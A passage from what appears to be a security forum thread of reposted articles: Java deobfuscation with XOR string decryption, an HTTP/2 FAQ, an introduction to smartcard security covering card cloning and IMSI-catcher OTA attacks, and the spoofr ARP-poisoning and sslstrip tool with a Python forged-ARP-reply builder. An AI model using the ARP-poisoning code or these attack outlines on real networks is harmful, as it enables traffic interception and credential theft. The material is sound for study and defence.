down to an interesting looking class: Figure 1 - JD-GUI showing the output from the decompilation The first observation we can make is that JD-GUI has not successfully decompiled the class file entirely. The obfuscator has performed some intentional modifications to the bytecode which have hampered decompilation.
If we follow the sequence of events in the first z function, we can see that it does not flow correctly: incorrect variables are used where they shouldn’t be, and a non-existent variable is returned. The second z function also seems very fishy; the last line is somehow indexing into an integer, which is definitely not allowed in Java. Screenshot shown below. Figure 2 - Showing the suspicious second 'z' function Abandoning JD-GUI and picking up trusty JAD [2] (a command line Java .class decompiler) yields better results, but still not perfect: Figure 3 - Showing the output that JAD generates We can see that decompilation has failed, as JAD inserts raw JVM instructions (as opposed to high level Java source); in fact, JAD tells us as much in its command line output. Fortunately, it appears that the decoding failures exist only in a consistent but limited set of functions and not the entire class. Secondly, we can see that the strings are not immediately readable; it is quite obvious that there is some encryption in use. The decryption routine appears to be the function z, as it is called with the encrypted string as the input. As shown in Figure 2 there are two functions sharing the name z; this is allowed in Object Oriented languages (function overloading [3]) and it is common for obfuscators to exploit such functionality. It is however possible to determine the true order of the called functions by looking at the types or the count of the parameters. Since our first call to z provides a string as the parameter, we can derive the true order and better understand its functionality. We can see in Figure 4 (below) that the first z converts the input string ‘s’ to a character array: if the length of the array is 1 it performs a bitwise XOR with 0x4D, otherwise it returns the char array as-is. JAD was unable to correctly decompile the function, but in this case such a simple function is easy to analyse.
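The behaviour described for the first z function can be sketched in Python (our own translation of the decompiled logic; the name z_stage1 is ours, the original function is simply called z):

```python
def z_stage1(s):
    """First 'z' stage: string -> char array, XORing single-char strings with 0x4D."""
    ac = list(s)
    if len(ac) == 1:
        # single-character strings get XORed with the constant 0x4D
        ac[0] = chr(ord(ac[0]) ^ 0x4D)
    return ac

print(z_stage1("A"))   # ['\x0c']  (0x41 ^ 0x4D = 0x0C)
print(z_stage1("AB"))  # ['A', 'B'] (returned as-is)
```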
Figure 4 - Showing the first 'z' function The second z function (seen in Figure 5 below) appears to be where the actual decryption is done. Figure 5 - Second 'z' function, highlighting the interesting integer values To know what happens with the input, we must understand that the JVM is a stack based machine: operands are pushed onto the stack and operated upon when popped. The first important instruction we see is that the variable i is set to 0; we then see the instruction caload, which loads a character from an array at a given index. While JAD has not successfully decompiled it, we can see that the index is the variable i and the array is the input character array ac (in fact, ac is pushed onto the stack at the very start of our function). Next, there is a switch statement, which determines the value of byte0. After the switch statement, byte0 is pushed onto the stack. For the first iteration, its value will be 0x51. The following operations perform a bitwise XOR between the byte0 value and the character in ac at index i. Then i is incremented and compared with the length of ac: if the index has reached the length of ac, the ac array is converted to a string and returned; if the index is less than the length of ac, the code jumps back to L3 and performs another iteration on the next index. In summary, this z function takes the input and loops over it, taking the current index within the input and performing a bitwise XOR against a key that changes depending on the current index. We also note that there is a modulo 5 operation applied to the current index, indicating that there are 5 possible keys (shown in red in Figure 5).
To neaten this up, we will convert the second z to pseudocode: keys = [81,54,2,113,77] // below input is "#Sq\0368#Ug\002b\"Oq\005(<\030r\003\"!Sp\005$4E" input = [ 0x23, 0x53, 0x71, 0x1e, 0x38, 0x23, 0x55, 0x67, 0x02, 0x62, 0x22, 0x4f, 0x71, 0x05, 0x28, 0x3c, 0x18, 0x72, 0x03, 0x22, 0x21, 0x53, 0x70, 0x05, 0x24, 0x34, 0x45 ] for i in 0..input.length-1 do printf "%c" (keys[i%keys.length] ^ input[i]) As you can see from the above code, it converts to a simple loop that performs the bitwise XOR operation on each character within the input string; we have replaced the switch with an index into the keys array. The code results in the string "resources/system.properties" being printed - not at all an interesting string - but we have achieved decryption. Problem analysis With knowledge of the key and an understanding of the encryption algorithm used, we should now be able to extract all the strings from the class file and decrypt them. Unfortunately this approach fails; this is a result of each class file within the Java archive using a different XOR key. To decrypt the strings en masse, a different approach is required. Ideally, we should programmatically extract the key from every class file, and use the extracted key to decrypt the strings within that file. One approach could be to perform the disassembly using JAD, and then write a script to extract out the switch table – which holds the XOR key - and the strings using regexes. This would be reasonably simple but error-prone, and regex just does not seem like an elegant solution. An alternative approach is to write our own Java decompiler, which gives us a nice abstracted way of performing program analysis. With a larger time investment, this is certainly a more elegant solution. To perform this task, we chose the second option. As it turns out, the JVM instruction set is quite simple to parse and is well documented [4, 5, and 6], so the process of writing the disassembler was not difficult.
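The pseudocode above translates directly into runnable Python; the keys and ciphertext are the values recovered from the disassembly (81, 54, 2, 113, 77 are 0x51, 0x36, 0x02, 0x71, 0x4D in hex):

```python
# Key bytes extracted from the tableswitch, in hex
keys = [0x51, 0x36, 0x02, 0x71, 0x4D]

# The encrypted string constant from the class file
cipher = [0x23, 0x53, 0x71, 0x1e, 0x38, 0x23, 0x55, 0x67, 0x02,
          0x62, 0x22, 0x4f, 0x71, 0x05, 0x28, 0x3c, 0x18, 0x72,
          0x03, 0x22, 0x21, 0x53, 0x70, 0x05, 0x24, 0x34, 0x45]

# XOR each byte with a key chosen by index modulo the key count
plain = "".join(chr(keys[i % len(keys)] ^ c) for i, c in enumerate(cipher))
print(plain)  # resources/system.properties
```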
Parsing the class file - overview First we parse the class file format, extracting the constants pool, fields, interfaces, classes and methods. We then disassemble the method bodies (mapping instructions to a set of opcodes); the resulting disassembly looks like the below (snippet): Figure 6 - Showing the byte to opcode translation; each section is divided into a grouping (e.g. Constants, Loads, Maths, Stack), an operation (e.g. bipush) and an optional argument (instruction dependent, such as ‘77’). As you can see, the above shows the tagged data that resulted from parsing the JVM bytecode into a list of opcodes with their associated data. Extracting the encryption function We are after the switch section of the disassembled code, as this contains the XOR key that we will use to decrypt the ciphertext. We can see based on the documentation that it maps back to the instruction tableswitch [7], which is implemented as a jump table, as one would expect. Now it is a matter of mapping over the opcodes to locate the tableswitch instruction. Below is the section of the opcode list we are interested in: As you can see, the tableswitch instruction contains arguments: the first argument is the default case (67), and the second argument is the jump table, which maps a 'case' to a jump. In this example, case 0 maps to the jump 48. The last argument (not in screenshot) is the padding, which we discard. Our algorithm for extracting this table is as follows:
1. Detect if a control section contains a tableswitch.
2. Extract the tableswitch.
3. Extract the jumps from the tableswitch.
4. Build a new jump table containing the original jump table with the default jump case appended on the end. We now have all the jumps to the keys.
5. Map over the method body and resolve the jumps to values. We now have all the key values and the XOR function name.
Figure 7 – Code (F#) showing the pattern matching function which implements the algorithm to extract switch tables.
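The extraction algorithm above can be illustrated in Python. Note that this is our own sketch, not the authors' F# code; in particular, the (offset, name, args) tuple format for the parsed opcode list is an assumption about the internal representation:

```python
# Illustrative sketch: extract the XOR key bytes from a tableswitch jump table.
# The opcode tuple layout (offset, mnemonic, args) is a hypothetical representation.
def extract_switch_keys(ops):
    """ops: list of (offset, mnemonic, args) tuples from a disassembled method body."""
    for _off, name, args in ops:
        if name != "tableswitch":
            continue
        default, jump_table = args[0], args[1]
        # Steps 3-4: gather the case jumps, then append the default case
        jumps = [target for _case, target in jump_table] + [default]
        # Step 5: resolve each jump target to the constant it pushes (bipush)
        by_offset = {o: (n, a) for o, n, a in ops}
        return [by_offset[j][1][0] for j in jumps
                if by_offset.get(j, ("", []))[0] == "bipush"]
    return []

# Toy method body mirroring the values seen in the article's screenshots
ops = [(48, "bipush", [81]), (50, "bipush", [54]), (52, "bipush", [2]),
       (54, "bipush", [113]), (67, "bipush", [77]),
       (10, "tableswitch", [67, [(0, 48), (1, 50), (2, 52), (3, 54)]])]
print(extract_switch_keys(ops))  # [81, 54, 2, 113, 77]
```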
Figure 8 - Showing the resulting extracted XOR keys from the switch table The next step is to locate the section of the class where the strings are held. In the case of this obfuscator, we have determined through multiple decompilations that the encrypted strings are stored within the static initialization section [8], which JAD generally does not handle effectively. At runtime, when the class is initialised, the strings are decrypted and the resulting plaintext is assigned to the respective variable. Extracting the static initialization section is trivial: we map over the code body and find sections where the name is `<clinit>' [9] and the descriptor is `()V', which denotes a method with no parameters that returns void [10]. Once we have extracted this, we resolve the 'private static' values, making sure to only select the values where our decryption function is being called (we know the name of the function as we saved it). It is now just a process of resolving the strings within the constants pool. At this stage we have:
- the decryption key extracted;
- the actual decryption algorithm implemented (XOR); and
- the encrypted strings.
We can now decrypt the strings and replace the respective constant pool entry with the plaintext. Since the decryption uses a basic bitwise XOR, the plaintext length is equal to the ciphertext length, which means we don't have to worry about truncation or accidentally overwriting non-relevant parts of the constant pool. Later we plan to update the variable names throughout the classes and remove the decryption functions. Figure 9 - Example decryption: plaintext bytes, cipher bytes, and plaintext result. The particular class file we chose to look at turned out not to have any interesting strings, but we are now able to see exactly what it does. The next stage is to loop over all class files and decrypt all the strings, then analyse the results so that we can hopefully find vulnerabilities, which is a story for another day.
Conclusion In conclusion, we have shown that by investing time into our reversing we are able to have higher confidence in the functionality of the target application, and by automating the recovery of obfuscated code we have shown that obfuscation alone is not an adequate protection mechanism, though it does slow an attacker down. In addition to the automated recovery, we now have a skeleton Java decompiler, which will eventually be lifted into our static analysis tool. Finally, we have shown that if you try hard enough, everything becomes a fun programming challenge. [0] Protect Your Java Code - Through Obfuscators and Beyond [1] Java Decompiler [2] JAD (original link now dead) [3] Function overloading - Wikipedia [4] https://github.com/Storyyeller/Krakatau [5] https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-4.html [6] http://docs.oracle.com/javase/specs/jvms/se8/html/jvms-6.html [7] http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-6.html#jvms-6.5.tableswitch [8] http://docs.oracle.com/javase/tutorial/java/javaOO/initial.html [9] http://stackoverflow.com/questions/8517121/java-vmspec-what-is-difference-between-init-and-clinit [10] http://stackoverflow.com/questions/14721852/difference-between-byte-code-initv-vs-initzv Sursa: http://www.contextis.com/resources/blog/automating-removal-java-obfuscation/
  19. HTTP/2 Frequently Asked Questions These are Frequently Asked Questions about HTTP/2. General Questions Why revise HTTP? Who is doing this? What’s the relationship with SPDY? Is it HTTP/2.0 or HTTP/2? What are the key differences to HTTP/1.x? Why is HTTP/2 binary? Why is HTTP/2 multiplexed? Why just one TCP connection? What’s the benefit of Server Push? Why do we need header compression? Why HPACK? Can HTTP/2 make cookies (or other headers) better? What about non-browser users of HTTP? Does HTTP/2 require encryption? What does HTTP/2 do to improve security? Can I use HTTP/2 now? Will HTTP/2 replace HTTP/1.x? Will there be a HTTP/3? Implementation Questions Why the rules around Continuation on HEADERS frames? What is the minimum or maximum HPACK state size? How can I avoid keeping state? Why is there a single compression/flow-control context? Why is there an EOS symbol in HPACK? Deployment Questions How do I debug HTTP/2 if it’s encrypted? General Questions Why revise HTTP? HTTP/1.1 has served the Web well for more than fifteen years, but its age is starting to show. Loading a Web page is more resource intensive than ever (see the HTTP Archive’s page size statistics), and loading all of those assets efficiently is difficult, because HTTP practically only allows one outstanding request per TCP connection. In the past, browsers have used multiple TCP connections to issue parallel requests. However, there are limits to this; if too many connections are used, it’s both counter-productive (TCP congestion control is effectively negated, leading to congestion events that hurt performance and the network), and it’s fundamentally unfair (because browsers are taking more than their share of network resources). At the same time, the large number of requests means a lot of duplicated data “on the wire”. Both of these factors mean that HTTP/1.1 requests have a lot of overhead associated with them; if too many requests are made, it hurts performance.
This has led the industry to a place where it’s considered Best Practice to do things like spriting, data: inlining, domain sharding and concatenation. These hacks are indications of underlying problems in the protocol itself, and cause a number of problems on their own when used. Who made HTTP/2? HTTP/2 was developed by the IETF’s HTTP Working Group, which maintains the HTTP protocol. It’s made up of a number of HTTP implementers, users, network operators and HTTP experts. Note that while our mailing list is hosted on the W3C site, this is not a W3C effort. Tim Berners-Lee and the W3C TAG are kept up-to-date with the WG’s progress, however. A large number of people have contributed to the effort, but the most active participants include engineers from “big” projects like Firefox, Chrome, Twitter, Microsoft’s HTTP stack, Curl and Akamai, as well as a number of HTTP implementers in languages like Python, Ruby and NodeJS. To learn more about participating in the IETF, see the Tao of the IETF; you can also get a sense of who’s contributing to the specification on Github’s contributor graph, and who’s implementing on our implementation list. What’s the relationship with SPDY? HTTP/2 was first discussed when it became apparent that SPDY was gaining traction with implementers (like Mozilla and nginx), and was showing significant improvements over HTTP/1.x. After a call for proposals and a selection process, SPDY/2 was chosen as the basis for HTTP/2. Since then, there have been a number of changes, based on discussion in the Working Group and feedback from implementers. Throughout the process, the core developers of SPDY have been involved in the development of HTTP/2, including both Mike Belshe and Roberto Peon. In February 2015, Google announced its plans to remove support for SPDY in favor of HTTP/2. Is it HTTP/2.0 or HTTP/2? The Working Group decided to drop the minor version (“.0”) because it has caused a lot of confusion in HTTP/1.x. 
In other words, the HTTP version only indicates wire compatibility, not feature sets or “marketing.” What are the key differences to HTTP/1.x? At a high level, HTTP/2: is binary, instead of textual is fully multiplexed, instead of ordered and blocking can therefore use one connection for parallelism uses header compression to reduce overhead allows servers to “push” responses proactively into client caches Why is HTTP/2 binary? Binary protocols are more efficient to parse, more compact “on the wire”, and most importantly, they are much less error-prone, compared to textual protocols like HTTP/1.x, because they often have a number of affordances to “help” with things like whitespace handling, capitalization, line endings, blank lines and so on. For example, HTTP/1.1 defines four different ways to parse a message; in HTTP/2, there’s just one code path. It’s true that HTTP/2 isn’t usable through telnet, but we already have some tool support, such as a Wireshark plugin. Why is HTTP/2 multiplexed? HTTP/1.x has a problem called “head-of-line blocking,” where effectively only one request can be outstanding on a connection at a time. HTTP/1.1 tried to fix this with pipelining, but it didn’t completely address the problem (a large or slow response can still block others behind it). Additionally, pipelining has been found very difficult to deploy, because many intermediaries and servers don’t process it correctly. This forces clients to use a number of heuristics (often guessing) to determine what requests to put on which connection to the origin when; since it’s common for a page to load 10 times (or more) the number of available connections, this can severely impact performance, often resulting in a “waterfall” of blocked requests. Multiplexing addresses these problems by allowing multiple request and response messages to be in flight at the same time; it’s even possible to intermingle parts of one message with another on the wire.
This, in turn, allows a client to use just one connection per origin to load a page. Why just one TCP connection? With HTTP/1, browsers open between four and eight connections per origin. Since many sites use multiple origins, this could mean that a single page load opens more than thirty connections. One application opening so many connections simultaneously breaks a lot of the assumptions that TCP was built upon; since each connection will start a flood of data in the response, there’s a real risk that buffers in the intervening network will overflow, causing a congestion event and retransmits. Additionally, using so many connections unfairly monopolizes network resources, “stealing” them from other, better-behaved applications (e.g., VoIP). What’s the benefit of Server Push? When a browser requests a page, the server sends the HTML in the response, and then needs to wait for the browser to parse the HTML and issue requests for all of the embedded assets before it can start sending the JavaScript, images and CSS. Server Push allows the server to avoid this round trip of delay by “pushing” the responses it thinks the client will need into its cache. Why do we need header compression? Patrick McManus from Mozilla showed this vividly by calculating the effect of headers for an average page load. If you assume that a page has about 80 assets (which is conservative in today’s Web), and each request has 1400 bytes of headers (again, not uncommon, thanks to Cookies, Referer, etc.), it takes at least 7-8 round trips to get the headers out “on the wire.” That’s not counting response time - that’s just to get them out of the client. This is because of TCP’s Slow Start mechanism, which paces packets out on new connections based on how many packets have been acknowledged – effectively limiting the number of packets that can be sent for the first few round trips. 
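The slow-start arithmetic behind that round-trip estimate can be sketched as follows. The numbers here are our own illustrative assumptions (a typical 1460-byte TCP segment payload and two example initial congestion windows); the FAQ's 7-8 figure also depends on connection setup and the window sizes in use at the time:

```python
import math

MSS = 1460  # assumed TCP segment payload in bytes

def rtts_to_send(total_bytes, initcwnd):
    """Round trips slow start needs to push total_bytes, doubling cwnd each RTT."""
    packets = math.ceil(total_bytes / MSS)
    cwnd, sent, rtts = initcwnd, 0, 0
    while sent < packets:
        sent += cwnd
        cwnd *= 2
        rtts += 1
    return rtts

header_bytes = 80 * 1400                # 80 requests x 1400 bytes of headers
print(rtts_to_send(header_bytes, 10))   # 4  (modern IW10 initial window)
print(rtts_to_send(header_bytes, 3))    # 5  (smaller, older initial window)
```

Either way, several round trips are consumed before the requests even leave the client, which is the overhead header compression removes.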
In comparison, even mild compression on headers allows those requests to get onto the wire within one roundtrip – perhaps even one packet. This overhead is considerable, especially when you consider the impact upon mobile clients, which typically see round-trip latency of several hundred milliseconds, even under good conditions. Why HPACK? SPDY/2 proposed using a single GZIP context in each direction for header compression, which was simple to implement as well as efficient. Since then, a major attack has been documented against the use of stream compression (like GZIP) inside of encryption; CRIME. With CRIME, it’s possible for an attacker who has the ability to inject data into the encrypted stream to “probe” the plaintext and recover it. Since this is the Web, JavaScript makes this possible, and there were demonstrations of recovery of cookies and authentication tokens using CRIME for TLS-protected HTTP resources. As a result, we could not use GZIP compression. Finding no other algorithms that were suitable for this use case as well as safe to use, we created a new, header-specific compression scheme that operates at a coarse granularity; since HTTP headers often don’t change between messages, this still gives reasonable compression efficiency, and is much safer. Can HTTP/2 make cookies (or other headers) better? This effort was chartered to work on a revision of the wire protocol – i.e., how HTTP headers, methods, etc. are put “onto the wire”, not change HTTP’s semantics. That’s because HTTP is so widely used. If we used this version of HTTP to introduce a new state mechanism (one example that’s been discussed) or change the core methods (thankfully, this hasn’t yet been proposed), it would mean that the new protocol was incompatible with the existing Web. In particular, we want to be able to translate from HTTP/1 to HTTP/2 and back with no loss of information. 
If we started “cleaning up” the headers (and most will agree that HTTP headers are pretty messy), we’d have interoperability problems with much of the existing Web. Doing that would just create friction against the adoption of the new protocol. All of that said, the HTTP Working Group is responsible for all of HTTP, not just HTTP/2. As such, we can work on new mechanisms that are version-independent, as long as they’re backwards-compatible with the existing Web. What about non-browser users of HTTP? Non-browser applications should be able to use HTTP/2 as well, if they’re already using HTTP. Early feedback has been that HTTP/2 has good performance characteristics for HTTP “APIs”, because the APIs don’t need to consider things like request overhead in their design. Having said that, the main focus of the improvements we’re considering is the typical browsing use cases, since this is the core use case for the protocol. Our charter says this about it: The resulting specification(s) are expected to meet these goals for common existing deployments of HTTP; in particular, Web browsing (desktop and mobile), non-browsers ("HTTP APIs"), Web serving (at a variety of scales), and intermediation (by proxies, corporate firewalls, "reverse" proxies and Content Delivery Networks). Likewise, current and future semantic extensions to HTTP/1.x (e.g., headers, methods, status codes, cache directives) should be supported in the new protocol. Note that this does not include uses of HTTP where non-specified behaviours are relied upon (e.g., connection state such as timeouts or client affinity, and "interception" proxies); these uses may or may not be enabled by the final product. Does HTTP/2 require encryption? No. After extensive discussion, the Working Group did not have consensus to require the use of encryption (e.g., TLS) for the new protocol. However, some implementations have stated that they will only support HTTP/2 when it is used over an encrypted connection. 
What does HTTP/2 do to improve security? HTTP/2 defines a profile of TLS that is required; this includes the version, a ciphersuite blacklist, and extensions used. See the spec for details. There is also discussion of additional mechanisms, such as using TLS for HTTP:// URLs (so-called “opportunistic encryption”); see the relevant draft. Can I use HTTP/2 now? HTTP/2 is currently available in Firefox and Chrome for testing, using the “h2-14” protocol identifier. There are also several servers available (including a test server from Akamai, Google and Twitter’s main sites), and a number of Open Source implementations that you can deploy and test. See the implementations list for more details. Will HTTP/2 replace HTTP/1.x? The goal of the Working Group is that typical uses of HTTP/1.x can use HTTP/2 and see some benefit. Having said that, we can’t force the world to migrate, and because of the way that people deploy proxies and servers, HTTP/1.x is likely to still be in use for quite some time. Will there be a HTTP/3? If the negotiation mechanism introduced by HTTP/2 works well, it should be possible to support new versions of HTTP much more easily than in the past. Implementation Questions Why the rules around Continuation on HEADERS frames? Continuation exists since a single value (e.g. Set-Cookie) could exceed 16KiB - 1, which means it couldn’t fit into a single frame. It was decided that the least error-prone way to deal with this was to require that all of the headers data come in back-to-back frames, which made decoding and buffer management easier. What is the minimum or maximum HPACK state size? The receiver always controls the amount of memory used in HPACK, and can set it to zero at a minimum, with a maximum related to the maximum representable integer in a SETTINGS frame, currently 2^32 - 1. How can I avoid keeping HPACK state? 
Send a SETTINGS frame setting state size (SETTINGS_HEADER_TABLE_SIZE) to zero, then RST all streams until a SETTINGS frame with the ACK bit set has been received. Why is there a single compression/flow-control context? Simplicity. The original proposals had stream groups, which would share context, flow control, etc. While that would benefit proxies (and the experience of users going through them), doing so added a fair bit of complexity. It was decided that we’d go with the simple thing to begin with, see how painful it was, and address the pain (if any) in a future protocol revision. Why is there an EOS symbol in HPACK? HPACK’s Huffman encoding, for reasons of CPU efficiency and security, pads out Huffman-encoded strings to the next byte boundary; there may be between 0-7 bits of padding needed for any particular string. If one considers Huffman decoding in isolation, any symbol that is longer than the required padding would work; however, HPACK’s design allows for bytewise comparison of Huffman-encoded strings. By requiring that the bits of the EOS symbol are used for padding, we ensure that users can do bytewise comparison of Huffman-encoded strings to determine equality. This in turn means that many headers can be interpreted without being Huffman decoded. Can I implement HTTP/2 without implementing HTTP/1.1? Yes, mostly. For HTTP/2 over TLS (h2), if you do not implement the http1.1 ALPN identifier, then you will not need to support any HTTP/1.1 features. For HTTP/2 over TCP (h2c), you need to implement the initial upgrade request. h2c-only clients will need to generate an OPTIONS request for “*” or a HEAD request for “/”, which are fairly safe and easy to construct. Clients looking to implement HTTP/2 only will need to treat HTTP/1.1 responses without a 101 status code as errors. h2c-only servers can accept a request containing the Upgrade header field with a fixed 101 response.
Requests without the h2c upgrade token can be rejected with a 505 (HTTP Version Not Supported) status code that contains the Upgrade header field. Servers that don’t wish to process the HTTP/1.1 response should reject stream 1 with a REFUSED_STREAM error code immediately after sending the connection preface to encourage the client to retry the request over the upgraded HTTP/2 connection. Deployment Questions How do I debug HTTP/2 if it’s encrypted? There are many ways to get access to the application data, but the easiest is to use NSS keylogging in combination with the Wireshark plugin (included in recent development releases). This works with both Firefox and Chrome. Sursa: https://http2.github.io/faq/
  20. Introduction to Smartcard Security Introduction In 1968 and 1969, the smartcard was patented in Germany by Helmut Gröttrup and Jürgen Dethloff. The smartcard is simply a card with an integrated circuit that can be programmed. This technology has been used widely in our daily lives and will become one of the important keys in Internet of Things (IoT) and Machine to Machine (M2M) technology. Smartcard applications can be programmed using Java Card, an open platform from Sun Microsystems. Today, we find smartcard technology mostly used in communications (GSM/CDMA SIM cards) and payments (credit/debit cards). These are examples of smartcard technology that has been used in Indonesia: Picture 1. EMV debit card. Picture 2. Bolt 4G card. Smartcard Architecture Picture 3. Smartcard architecture (image courtesy of THC) How Does the Smartcard Work? 1. Smartcard Activation In order to interact with a smartcard that has been connected to a smartcard terminal, it should be activated using electrical signals according to smartcard specification class A, B, or C (ISO/IEC 7816-3). The activation sequence goes like this:
- The RST pin should be put to the LOW state.
- The Vcc pin should be powered.
- The I/O pin on the smartcard terminal should be put into receive mode, although it may ignore the I/O logic while smartcard activation takes place.
- The CLK pin should provide a clock signal to the smartcard.
More detailed information about this smartcard activation (before timing Ta) can be seen in this picture: Picture 4. Smartcard activation and cold reset. 2. Cold Reset At the end of activation (RST pin pulled LOW, Vcc pin powered, I/O pin on the smartcard terminal put into receive mode and CLK pin supplying a stable clock signal), the smartcard is ready to enter Cold Reset.
As you can see from the above picture, the clock signal at the CLK pin starts at Ta, and the smartcard will set the I/O signal to HIGH within 200 clock cycles (ta delay) after the clock signal is applied to the CLK pin (Ta + ta). The RST pin should be kept in the LOW state for at least 400 clock cycles (tb delay) after the clock signal has been given to the CLK pin (Ta + tb). The smartcard terminal may ignore the logic on the I/O pin while the RST pin is in the LOW state. The RST pin then changes to the HIGH state after reaching Tb. The I/O pin will begin the Answer-to-Reset from 400 to 40000 clock cycles (tc delay) after the rising edge signal on the RST pin (Tb + tc). If there is no answer after 40000 clock cycles while the RST pin is in the HIGH state, the smartcard terminal may deactivate the smartcard. 3. Smartcard ATR (Answer-to-Reset) After the smartcard performs a cold reset, it will continue with the Answer-to-Reset (ATR). The complete ATR structure is covered in ISO/IEC 7816-3, and it looks like this: TS T0 TA1 TB1 TC1 TD1 TA2 … … TDn T1 … TK TCK For example, this is the Answer-to-Reset that we receive after performing a cold reset on a smartcard: 3B BE 94 00 40 14 47 47 33 53 33 44 48 41 54 4C 39 31 30 30 After receiving the ATR above, we then continue with interpreting the data as follows: TS = 3B This means that the smartcard operates using the direct convention, which works almost like the UART protocol. The direct convention operation is covered in ISO/IEC 7816-3. T0 = BE (binary 1011 1110) – The high nibble (0xB = binary 1011) means that there is data in TA1, TB1, and TD1. – The low nibble (0xE = 14 decimal) means that there are 14 bytes of history data (TK). TA1 = 94 (binary 1001 0100) – The high nibble (0x9 = binary 1001) means that the clock rate is Fi = 512 with fmax = 5 MHz. – The low nibble (0x4 = binary 0100) means that the bit rate is Di = 8. TB1 = 00 According to ISO/IEC 7816-3, TB1 and TB2 have been deprecated and are no longer used, so the smartcard doesn’t have to transmit them and the smartcard terminal can simply ignore them.
    TD1 = 40 (0100 0000₂)
    - The high nibble (4₁₆ = 0100₂) means that TC2 is present.
    - The low nibble (0₁₆ = 0000₂) means that the smartcard uses the T = 0 protocol.

    TC2 = 14 (20₁₀)
    This is the Waiting Time Integer (WI), with a value of 20. According to ISO/IEC 7816-3, this value is used to calculate the Waiting Time (WT).

    History bytes = 47 47 33 53 33 44 48 41 54 4C 39 31 30 30
    Converted to ASCII: G G 3 S 3 D H A T L 9 1 0 0

    4. Protocol and Parameter Selection (PPS)

    After receiving the Answer-to-Reset (ATR), the smartcard terminal can send a PPS instruction to choose which protocol and parameters to use, making data transfer between the smartcard and the terminal easier.

    5. Data Transfer Between Smartcard and Terminal

    After the Protocol and Parameter Selection (PPS) has been set up, the smartcard and the terminal interface can begin transferring data using Application Protocol Data Units (APDUs). The complete APDU structure is covered in ISO 7816-4.

    Vulnerabilities

    There are quite a lot of vulnerabilities related to the Java Card platform, and most of them have been documented across the Internet. These are some of the smartcard attack vectors:

    1. Physical attack:
    - Reverse engineering.
    - Smartcard cloning.

    2. Remote attack:
    - IMSI catcher.

    Attacking a Smartcard

    1. Physical Attack

    A physical attack can be carried out if the attacker has physical contact with the victim's smartcard and gets access to important data on the card. Once the attacker has access to that data, he/she can clone or reprogram the smartcard.

    1.1. Reverse Engineering

    Picture 5. Typical smartcard front side.
    Picture 6. Typical smartcard back side.
    Picture 7. Smartcard IC "die"

    Reverse engineering a smartcard at the silicon level is not an easy task, and it requires special tools such as a Scanning Electron Microscope (SEM) and/or a Focused Ion Beam (FIB).

    1.2. Smartcard Cloning

    For this purpose, an attacker can use a couple of devices, such as an oscilloscope and a smartcard reader. This is an example of a DIY smartcard reader (phoenix reader):

    Picture 8. DIY smartcard reader (phoenix reader).

    However, there is a catch with a phoenix reader like the one in the picture above: it lacks applications for interfacing with the smartcard. The reference schematic for the phoenix reader used here was developed by Dejan Kaljevic and is freely available.

    Picture 9. Phoenix reader schematic.

    Smartcard cloning is not just about programming the smartcard; it also involves retrieving important information about the victim's smartcard, such as which vendor issued the card. A more convenient way to interact with the smartcard is to use a PC/SC reader with an open-source application called pcsc_scan. This is an example of pcsc_scan usage:

    Picture 10. Information retrieved from a payment smartcard.
    Picture 11. Information from a 3G/4G smartcard.

    As you can see in the pictures above, we can get some information from the smartcard attached to the terminal. Picture 10 shows a smartcard commonly used by financial institutions, which complies with the EMV standard, and Picture 11 shows a smartcard (USIM) commonly used for communication (3G/4G). That information can be used to determine what kind of encryption the smartcard uses, since vendors tend to follow standard specifications rather than custom encryption. Attackers can then use the information to mount a remote attack.

    2. Remote Attack

    Remotely attacking a smartcard can be achieved by exploiting vulnerabilities in the smartcard, for example by injecting a malicious "binary SMS".

    2.1. IMSI Catcher

    The cost of this kind of attack is quite high, since the attacker must have hardware that can run OpenBTS and act as a fake BTS.
    In order to act as a fake BTS, that hardware must generate a stronger signal than the real BTS to force the victim's terminal (i.e., a mobile phone) to connect to the fake BTS.

    Picture 12. Fake BTS (IMSI catcher) illustration.

    After the victim's mobile phone connects to the fake BTS, the attacker can send a payload using the Over-the-Air (OTA) method common to GSM networks and direct the payload to the smartcard inside the mobile phone.

    Conclusion

    From the explanation above, we can conclude that an attacker exploiting a vulnerability in a smartcard could cause a catastrophic event, especially where critical infrastructure is involved, such as a SCADA installation that uses GSM networks or a financial institution that uses GSM networks for mobile banking. To prevent such attacks on smartcards, vendors could implement protections such as developing custom EEPROM layouts for the Java Card.

    References

    ISO/IEC 7816. (ISO/IEC 7816 - Wikipedia, the free encyclopedia)
    Java Card. (Java Card - Wikipedia, the free encyclopedia)
    Java Card Technology from Oracle. (http://www.oracle.com/technetwork/java/embedded/javacard/overview/index-jsp-140503.html)
    ETSI TS 100 977, TS 101 267, TS 102 221, TS 102 223, EN 302 409.

    Author: Tri Sumarno

    Sursa: Introduction to Smartcard Security - InfoSec Institute
  21. Nytro

    Cmd.fm

    Command line https://cmd.fm/
  22. Nytro

    spoofr

    spoofr

    spoofr - ARP poison and sniff with DNS spoofing, urlsnarf, driftnet, ferret, dsniff, sslstrip and tcpdump.

    Usage: spoofr -t <target> -s (break SSL) [in any order]
      -t - Target IP address extension
      -s - Break SSL
      -h - This help
    Example: spoofr -t 100 -s - Attack $ENET"100" and break SSL

    Sursa: https://github.com/d4rkcat/Spoofr
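    spoofr itself orchestrates existing tools (dsniff, sslstrip and friends) rather than crafting packets by hand. For illustration only, here is a minimal stand-alone Python sketch, not part of the tool, of the forged ARP reply that an ARP cache poisoner injects; all MAC and IP addresses below are made-up examples:

```python
import struct

def build_arp_reply(attacker_mac, victim_mac, spoofed_ip, victim_ip):
    """Build a raw Ethernet frame carrying a forged ARP reply that
    claims spoofed_ip is at attacker_mac (classic cache poisoning)."""
    # Ethernet header: destination MAC, source MAC, EtherType 0x0806 (ARP).
    eth = victim_mac + attacker_mac + struct.pack("!H", 0x0806)
    # ARP header: htype=1 (Ethernet), ptype=0x0800 (IPv4),
    # hlen=6, plen=4, oper=2 (reply).
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    arp += attacker_mac + spoofed_ip  # sender: attacker's MAC, victim's gateway IP
    arp += victim_mac + victim_ip     # target: the poisoned victim
    return eth + arp

# Example values only (hypothetical addresses):
frame = build_arp_reply(bytes.fromhex("aabbccddeeff"),
                        bytes.fromhex("112233445566"),
                        bytes([192, 168, 43, 1]),
                        bytes([192, 168, 43, 12]))
print(len(frame))  # 42: 14-byte Ethernet header + 28-byte ARP payload
```

    Sending such frames on a real network requires a raw socket and is exactly what tools like arpspoof automate; the sketch only shows the wire format.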
  23. Create your own MD5 collisions

